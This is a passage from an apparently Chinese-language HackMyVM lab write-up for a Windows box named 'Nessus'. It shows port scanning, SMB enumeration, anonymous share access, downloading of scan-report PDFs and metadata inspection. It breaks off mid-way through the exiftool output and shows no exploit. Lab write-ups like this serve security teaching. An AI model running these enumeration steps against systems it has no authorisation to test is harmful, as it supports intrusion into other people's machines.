{"id":845,"date":"2025-06-10T00:11:43","date_gmt":"2025-06-09T16:11:43","guid":{"rendered":"http:\/\/162.14.82.114\/?p=845"},"modified":"2025-06-10T00:11:43","modified_gmt":"2025-06-09T16:11:43","slug":"hmv-_-nessus","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/845\/06\/10\/2025\/","title":{"rendered":"hmv[-_-]Nessus"},"content":{"rendered":"<h1>Nessus<\/h1>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011590.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011590.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609150030709\" \/><\/div><\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011592.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011592.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609150917586\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h2>\u4fe1\u606f\u641c\u96c6<\/h2>\n<h3>\u7aef\u53e3\u626b\u63cf<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ rustscan -a $IP -- -sCV\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: http:\/\/discord.skerritt.blog         :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nPlease contribute more quotes to our GitHub https:\/\/github.com\/rustscan\/rustscan\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.10.100:139\nOpen 192.168.10.100:445\nOpen 192.168.10.100:135\nOpen 192.168.10.100:5985\nOpen 192.168.10.100:8834\nOpen 192.168.10.100:47001\nOpen 192.168.10.100:49664\nOpen 192.168.10.100:49665\nOpen 192.168.10.100:49666\nOpen 192.168.10.100:49667\nOpen 192.168.10.100:49668\nOpen 192.168.10.100:49669\n\nPORT      STATE SERVICE            REASON          VERSION\n135\/tcp   open  msrpc              syn-ack ttl 128 Microsoft Windows RPC\n139\/tcp   open  netbios-ssn        syn-ack ttl 128 Microsoft Windows netbios-ssn\n445\/tcp   open  microsoft-ds?      syn-ack ttl 128\n5985\/tcp  open  http               syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n8834\/tcp  open  ssl\/nessus-xmlrpc? syn-ack ttl 128\n|_ssl-date: TLS randomness does not represent time\n| ssl-cert: Subject: commonName=WIN-C05BOCC7F0H\/organizationName=Nessus Users United\/stateOrProvinceName=NY\/countryName=US\/localityName=New York\/organizationalUnitName=Nessus Server\n| Issuer: commonName=Nessus Certification Authority\/organizationName=Nessus Users United\/stateOrProvinceName=NY\/countryName=US\/localityName=New York\/organizationalUnitName=Nessus Certification Authority\n| Public Key type: rsa\n| Public Key bits: 2048\n| Signature Algorithm: sha256WithRSAEncryption\n| Not valid before: 2024-10-18T17:36:17\n| Not valid after:  2028-10-17T17:36:17\n| MD5:   d62f:ddbd:0931:a519:cc87:4c9a:f7bf:6ff7\n| SHA-1: 6bf2:207b:dc38:8181:aee2:03dc:0d3d:fa70:dd77:3af6\n| -----BEGIN CERTIFICATE-----\n| MIIEEjCCAvqgAwIBAgIDAJV2MA0GCSqGSIb3DQEBCwUAMIGdMRwwGgYDVQQKDBNO\n| ZXNzdXMgVXNlcnMgVW5pdGVkMScwJQYDVQQLDB5OZXNzdXMgQ2VydGlmaWNhdGlv\n| biBBdXRob3JpdHkxETAPBgNVBAcMCE5ldyBZb3JrMQswCQYDVQQGEwJVUzELMAkG\n| A1UECAwCTlkxJzAlBgNVBAMMHk5lc3N1cyBDZXJ0aWZpY2F0aW9uIEF1dGhvcml0\n| eTAeFw0yNDEwMTgxNzM2MTdaFw0yODEwMTcxNzM2MTdaMH0xHDAaBgNVBAoME05l\n| c3N1cyBVc2VycyBVbml0ZWQxFjAUBgNVBAsMDU5lc3N1cyBTZXJ2ZXIxETAPBgNV\n| BAcMCE5ldyBZb3JrMQswCQYDVQQGEwJVUzELMAkGA1UECAwCTlkxGDAWBgNVBAMM\n| D1dJTi1DMDVCT0NDN0YwSDCCASIwDQYJKoZIhvcNAQEBBQADggEPADCCAQoCggEB\n| ANYkmLB3EVCbKrHOOzIfW5n\/7WZBDBmW2lyg0kz185b10UyNDwiY5AgRwfC2WnaC\n| oThJ0QVlVb22s6c1XbaWvyITj1K5xKe1D2uIJHl10EqBcfPq2BefeaXtVoh4jqZu\n| VfafEpBwFSPC7dAnO4ZMghKBpWfogM3fYmavNdFptNASZqvTN7hskFETb4ARd397\n| WC+fXe+AG4MYgrLyJuZCa+qnI4adkADCCTTtU644Pl8OloVnnK8L5S3wNsEzDXQi\n| fvDyZKfo2WMh6BjgjN+X+Cxk4GtFsfX7QCiBr9nKakalE0Mq8nPO4Tm30Tm3GFN6\n| looCoH+ZYXAfnUfd8KvHDE8CAwEAAaN6MHgwEQYJYIZIAYb4QgEBBAQDAgZAMA4G\n| A1UdDwEB\/wQEAwIF4DAdBgNVHQ4EFgQU5ZEiC8RiIg\/FclNLopO\/rxRBC80wHwYD\n| VR0jBBgwFoAULRfLGNDUNuA90xpNsUsFyRiuDyQwEwYDVR0lBAwwCgYIKwYBBQUH\n| AwEwDQYJKoZIhvcNAQELBQADggEBAAToblD5fSPM3tyk14\/IK0cnDiHSuXFGxXhY\n| il7tC177Tb+dNN9vRW58pA4tR+8eDeKUfM+MX6LpJPka4seGbeFjVDppwthlAf44\n| ih37bwqAT7Kzznx59VMCjgyDqwe\/qprQ9z4OOrD0wnkx4KycTLHmnjCj\/rhyUN9+\n| WYHPmdwjEiBs2kLGBIVX30+jiwwgd8+nsamEYTVIEB0FCtts3On13KGyS8gpypAr\n| e7rQDFdkG+O\/M9LKBF+xdcc4SCfEGXdKZnv1V8GVElsYxQ+BxpLjzrI\/XLSvqqRm\n| 9i8HnGnU8AOEa0rzzdUhzWMjpCj4aG861UAOoOQso5RbHLqNTgU=\n|_-----END CERTIFICATE-----\n| fingerprint-strings: \n|   GetRequest: \n|     HTTP\/1.1 200 OK\n|     Cache-Control: must-revalidate\n|     X-Frame-Options: DENY\n|     Content-Type: text\/html\n|     ETag: d9565642fa203e8195c69acb664f1a88\n|     Connection: close\n|     X-XSS-Protection: 1; mode=block\n|     Server: NessusWWW\n|     Date: Mon, 09 Jun 2025 07:10:42 GMT\n|     X-Content-Type-Options: nosniff\n|     Content-Length: 1217\n|     Content-Security-Policy: upgrade-insecure-requests; block-all-mixed-content; form-action &#039;self&#039;; frame-ancestors &#039;none&#039;; frame-src https:\/\/store.tenable.com; default-src &#039;self&#039;; connect-src &#039;self&#039; www.tenable.com; script-src &#039;self&#039; www.tenable.com; img-src &#039;self&#039; data:; style-src &#039;self&#039; www.tenable.com; object-src &#039;none&#039;; base-uri &#039;self&#039;;\n|     Strict-Transport-Security: max-age=31536000\n|     Expect-CT: max-age=0\n|     &lt;!doctype html&gt;\n|     &lt;html lang=&quot;en&quot;&gt;\n|     &lt;head&gt;\n|     &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge,chrome=1&quot; \/&gt;\n|_    &lt;meta http-equiv=&quot;Content-Security-Policy&quot; content=&quot;upgrade-inse\n47001\/tcp open  http               syn-ack ttl 128 Microsoft HTTPAPI httpd 2.0 (SSDP\/UPnP)\n|_http-server-header: Microsoft-HTTPAPI\/2.0\n|_http-title: Not Found\n49664\/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC\n49665\/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC\n49666\/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC\n49667\/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC\n49668\/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC\n49669\/tcp open  msrpc              syn-ack ttl 128 Microsoft Windows RPC\n1 service unrecognized despite returning data. If you know the service\/version, please submit the following fingerprint at https:\/\/nmap.org\/cgi-bin\/submit.cgi?new-service :\nSF-Port8834-TCP:V=7.95%T=SSL%I=7%D=6\/9%Time=684688EE%P=x86_64-pc-linux-gnu\nSF:%r(GetRequest,788,&quot;HTTP\/1\\.1\\x20200\\x20OK\\r\\nCache-Control:\\x20must-rev\nSF:alidate\\r\\nX-Frame-Options:\\x20DENY\\r\\nContent-Type:\\x20text\/html\\r\\nET\nSF:ag:\\x20d9565642fa203e8195c69acb664f1a88\\r\\nConnection:\\x20close\\r\\nX-XS\nSF:S-Protection:\\x201;\\x20mode=block\\r\\nServer:\\x20NessusWWW\\r\\nDate:\\x20M\nSF:on,\\x2009\\x20Jun\\x202025\\x2007:10:42\\x20GMT\\r\\nX-Content-Type-Options:\\\nSF:x20nosniff\\r\\nContent-Length:\\x201217\\r\\nContent-Security-Policy:\\x20up\nSF:grade-insecure-requests;\\x20block-all-mixed-content;\\x20form-action\\x20\nSF:&#039;self&#039;;\\x20frame-ancestors\\x20&#039;none&#039;;\\x20frame-src\\x20https:\/\/store\\.te\nSF:nable\\.com;\\x20default-src\\x20&#039;self&#039;;\\x20connect-src\\x20&#039;self&#039;\\x20www\\.\nSF:tenable\\.com;\\x20script-src\\x20&#039;self&#039;\\x20www\\.tenable\\.com;\\x20img-src\\\nSF:x20&#039;self&#039;\\x20data:;\\x20style-src\\x20&#039;self&#039;\\x20www\\.tenable\\.com;\\x20obj\nSF:ect-src\\x20&#039;none&#039;;\\x20base-uri\\x20&#039;self&#039;;\\r\\nStrict-Transport-Security:\nSF:\\x20max-age=31536000\\r\\nExpect-CT:\\x20max-age=0\\r\\n\\r\\n&lt;!doctype\\x20htm\nSF:l&gt;\\n&lt;html\\x20lang=\\&quot;en\\&quot;&gt;\\n\\x20\\x20\\x20\\x20&lt;head&gt;\\n\\x20\\x20\\x20\\x20\\x20\nSF:\\x20\\x20\\x20&lt;meta\\x20http-equiv=\\&quot;X-UA-Compatible\\&quot;\\x20content=\\&quot;IE=edg\nSF:e,chrome=1\\&quot;\\x20\/&gt;\\n\\x20\\x20\\x20\\x20\\x20\\x20\\x20\\x20&lt;meta\\x20http-equiv\nSF:=\\&quot;Content-Security-Policy\\&quot;\\x20content=\\&quot;upgrade-inse&quot;);\nMAC Address: 08:00:27:D7:FF:F1 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\nService Info: OS: Windows; CPE: cpe:\/o:microsoft:windows\n\nHost script results:\n|_clock-skew: 4s\n| p2p-conficker: \n|   Checking for Conficker.C or higher...\n|   Check 1 (port 55615\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 2 (port 55927\/tcp): CLEAN (Couldn&#039;t connect)\n|   Check 3 (port 63337\/udp): CLEAN (Timeout)\n|   Check 4 (port 17382\/udp): CLEAN (Failed to receive data)\n|_  0\/4 checks are positive: Host is CLEAN or ports are blocked\n| nbstat: NetBIOS name: NESSUS, NetBIOS user: &lt;unknown&gt;, NetBIOS MAC: 08:00:27:d7:ff:f1 (PCS Systemtechnik\/Oracle VirtualBox virtual NIC)\n| Names:\n|   WORKGROUP&lt;00&gt;        Flags: &lt;group&gt;&lt;active&gt;\n|   NESSUS&lt;00&gt;           Flags: &lt;unique&gt;&lt;active&gt;\n|   NESSUS&lt;20&gt;           Flags: &lt;unique&gt;&lt;active&gt;\n| Statistics:\n|   08:00:27:d7:ff:f1:00:00:00:00:00:00:00:00:00:00:00\n|   00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00\n|_  00:00:00:00:00:00:00:00:00:00:00:00:00:00\n| smb2-time: \n|   date: 2025-06-09T07:12:28\n|_  start_date: N\/A\n| smb2-security-mode: \n|   3:1:1: \n|_    Message signing enabled but not required<\/code><\/pre>\n<h2>\u6f0f\u6d1e\u53d1\u73b0<\/h2>\n<h3>\u8e29\u70b9<\/h3>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011593.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011593.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609152829505\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011594.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011594.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609152913184\" style=\"zoom:50%;\" \/><\/div><\/p>\n<h3>smb\u670d\u52a1\u63a2\u6d4b<\/h3>\n<p>\u53d1\u73b0\u5f00\u542f\u4e86 smb \u670d\u52a1\uff0c\u5c1d\u8bd5\u8fdb\u884c\u63a2\u6d4b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ enum4linux -a $IP\nStarting enum4linux v0.9.1 ( http:\/\/labs.portcullis.co.uk\/application\/enum4linux\/ ) on Mon Jun  9 03:34:27 2025\n\n =========================================( Target Information )=========================================\n\nTarget ........... 192.168.10.100\nRID Range ........ 500-550,1000-1050\nUsername ......... &#039;&#039;\nPassword ......... &#039;&#039;\nKnown Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none\n\n ===========================( Enumerating Workgroup\/Domain on 192.168.10.100 )===========================\n\n[+] Got domain\/workgroup name: WORKGROUP\n\n ===============================( Nbtstat Information for 192.168.10.100 )===============================\n\nLooking up status of 192.168.10.100\n        WORKGROUP       &lt;00&gt; - &lt;GROUP&gt; B &lt;ACTIVE&gt;  Domain\/Workgroup Name\n        NESSUS          &lt;00&gt; -         B &lt;ACTIVE&gt;  Workstation Service\n        NESSUS          &lt;20&gt; -         B &lt;ACTIVE&gt;  File Server Service\n\n        MAC Address = 08-00-27-D7-FF-F1\n\n ==================================( Session Check on 192.168.10.100 )==================================\n\n[E] Server doesn&#039;t allow session using username &#039;&#039;, password &#039;&#039;.  Aborting remainder of tests.<\/code><\/pre>\n<p>\u63a5\u7740\u67e5\u770b\u4e00\u4e0b\u76f8\u5173\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ smbclient -L $IP       \nPassword for [WORKGROUP\\kali]:\n\n        Sharename       Type      Comment\n        ---------       ----      -------\n        ADMIN$          Disk      Remote Admin\n        C$              Disk      Default share\n        Documents       Disk      \n        IPC$            IPC       Remote IPC\nReconnecting with SMB1 for workgroup listing.\ndo_connect: Connection to 192.168.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)\nUnable to connect with SMB1 -- no workgroup available<\/code><\/pre>\n<p>\u53d1\u73b0\u5b58\u5728\u4e00\u4e2a\u5171\u4eab\u6587\u4ef6\u5939\uff0c\u5c1d\u8bd5\u8fdb\u884c\u8bfb\u53d6\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ smbclient \/\/$IP\/Documents \nPassword for [WORKGROUP\\kali]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; dir\n  .                                  DR        0  Fri Oct 18 20:42:53 2024\n  ..                                  D        0  Sat Oct 19 01:08:23 2024\n  desktop.ini                       AHS      402  Sat Jun 15 13:54:33 2024\n  My Basic Network Scan_hwhm7q.pdf      A   122006  Fri Oct 18 18:19:59 2024\n  My Music                        DHSrn        0  Sat Jun 15 13:54:27 2024\n  My Pictures                     DHSrn        0  Sat Jun 15 13:54:27 2024\n  My Videos                       DHSrn        0  Sat Jun 15 13:54:27 2024\n  Web Application Tests_f6jg9t.pdf      A   136025  Fri Oct 18 18:20:14 2024\n\n                12942591 blocks of size 4096. 10676065 blocks available\nsmb: \\&gt; <\/code><\/pre>\n<p>\u5c1d\u8bd5\u8fdb\u884c\u4e0b\u8f7d\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ smbclient \/\/$IP\/Documents\nPassword for [WORKGROUP\\kali]:\nTry &quot;help&quot; to get a list of possible commands.\nsmb: \\&gt; mget *\nGet file desktop.ini? y\ngetting file \\desktop.ini of size 402 as desktop.ini (15.7 KiloBytes\/sec) (average 15.7 KiloBytes\/sec)\nGet file My Basic Network Scan_hwhm7q.pdf? y\ngetting file \\My Basic Network Scan_hwhm7q.pdf of size 122006 as My Basic Network Scan_hwhm7q.pdf (1401.7 KiloBytes\/sec) (average 1086.7 KiloBytes\/sec)\nGet file Web Application Tests_f6jg9t.pdf? y\ngetting file \\Web Application Tests_f6jg9t.pdf of size 136025 as Web Application Tests_f6jg9t.pdf (2177.7 KiloBytes\/sec) (average 1475.9 KiloBytes\/sec)\nsmb: \\&gt; exit<\/code><\/pre>\n<p>\u770b\u4e00\u4e0b\u6709\u4e9b\u5565\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ cat desktop.ini \n\ufffd\ufffd\n[.ShellClassInfo]\nLocalizedResourceName=@%SystemRoot%\\system32\\shell32.dll,-21770\nIconResource=%SystemRoot%\\system32\\imageres.dll,-112\nIconFile=%SystemRoot%\\system32\\shell32.dll\nIconIndex=-235<\/code><\/pre>\n<p>\u53d1\u73b0\u5269\u4e0b\u7684\u662f\u4fe9\u626b\u63cf\u8bb0\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011595.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011595.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609155058715\" style=\"zoom: 50%;\" \/><\/div><\/p>\n<p>\u8fd8\u6709\u4e00\u4efd\u7ec4\u4ef6\u6f0f\u6d1e\u6d4b\u8bd5\u7ed3\u679c\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011596.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011596.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609155154282\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011597.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011597.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609155216551\" style=\"zoom:50%;\" \/><\/div><br \/>\n<div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011598.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202506100011598.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20250609155227054\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u4f46\u662f\u53ef\u80fd\u7528\u4e0d\u4e86\uff0c\u56e0\u4e3a\u4f5c\u8005\u5728\u7b80\u4ecb\u91cc\u63d0\u5230\u4e86\u4e0d\u4f1a\u4f7f\u7528<code>CVE\u6f0f\u6d1e<\/code>\u3002<\/p>\n<blockquote>\n<p>Just exploit a well known application without a CVE. Hope you enjoy it.<\/p>\n<\/blockquote>\n<p>\u5c1d\u8bd5\u770b\u4e00\u4e0b\u8fd9\u4fe9<code>pdf<\/code>\u6587\u4ef6\u662f\u5426\u5b58\u5728\u9690\u85cf\u4fe1\u606f\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\u327fkali)-[~\/temp\/Nessus]\n\u2514\u2500$ exiftool *       \n======== desktop.ini\nExifTool Version Number         : 13.10\nFile Name                       : desktop.ini\nDirectory                       : .\nFile Size                       : 402 bytes\nFile Modification Date\/Time     : 2025:06:09 03:48:20-04:00\nFile Access Date\/Time           : 2025:06:09 03:48:46-04:00\nFile Inode Change Date\/Time     : 2025:06:09 03:48:20-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : TXT\nFile Type Extension             : txt\nMIME Type                       : text\/plain\nMIME Encoding                   : utf-16le\nByte Order Mark                 : Yes\nNewlines                        : Windows CRLF\n======== My Basic Network Scan_hwhm7q.pdf\nExifTool Version Number         : 13.10\nFile Name                       : My Basic Network Scan_hwhm7q.pdf\nDirectory                       : .\nFile Size                       : 122 kB\nFile Modification Date\/Time     : 2025:06:09 03:48:22-04:00\nFile Access Date\/Time           : 2025:06:09 03:48:22-04:00\nFile Inode Change Date\/Time     : 2025:06:09 03:48:22-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : PDF\nFile Type Extension             : pdf\nMIME Type                       : application\/pdf\nLinearized                      : No\nPage Count                      : 5\nProfile CMM Type                : Little CMS\nProfile Version                 : 2.3.0\nProfile Class                   : Display Device Profile\nColor Space Data                : RGB\nProfile Connection Space        : XYZ\nProfile Date Time               : 2004:08:13 12:18:06\nProfile File Signature          : acsp\nPrimary Platform                : Microsoft Corporation\nCMM Flags                       : Not Embedded, Independent\nDevice Manufacturer             : Little CMS\nDevice Model                    : \nDevice Attributes               : Reflective, Glossy, Positive, Color\nRendering Intent                : Perceptual\nConnection Space Illuminant     : 0.9642 1 0.82491\nProfile Creator                 : Little CMS\nProfile ID                      : 7fb30d688bf82d32a0e748daf3dba95d\nDevice Mfg Desc                 : lcms generated\nProfile Description             : sRGB\nDevice Model Desc               : sRGB\nMedia White Point               : 0.95015 1 1.08826\nRed Matrix Column               : 0.43585 0.22238 0.01392\nBlue Matrix Column              : 0.14302 0.06059 0.71384\nGreen Matrix Column             : 0.38533 0.71704 0.09714\nRed Tone Reproduction Curve     : (Binary data 2060 bytes, use -b option to extract)\nGreen Tone Reproduction Curve   : (Binary data 2060 bytes, use -b option to extract)\nBlue Tone Reproduction Curve    : (Binary data 2060 bytes, use -b option to extract)\nChromaticity Channels           : 3\nChromaticity Colorant           : Unknown\nChromaticity Channel 1          : 0.64 0.33\nChromaticity Channel 2          : 0.3 0.60001\nChromaticity Channel 3          : 0.14999 0.06\nProfile Copyright               : no copyright, use freely\nXMP Toolkit                     : Image::ExifTool 12.76\nDate                            : 2024:10:18 15:10:05+02:00\nFormat                          : application\/pdf\nLanguage                        : x-unknown\nAuthor                          : Jose\nPDF Version                     : 1.4\nProducer                        : Apache FOP Version 2.8\nCreate Date                     : 2024:10:18 15:10:05+02:00\nCreator Tool                    : Apache FOP Version 2.8\nMetadata Date                   : 2024:10:18 15:10:05+02:00\nPage Mode                       : UseOutlines\nCreator                         : Apache FOP Version 2.8\n======== Web Application Tests_f6jg9t.pdf\nExifTool Version Number         : 13.10\nFile Name                       : Web Application Tests_f6jg9t.pdf\nDirectory                       : .\nFile Size                       : 136 kB\nFile Modification Date\/Time     : 2025:06:09 03:48:22-04:00\nFile Access Date\/Time           : 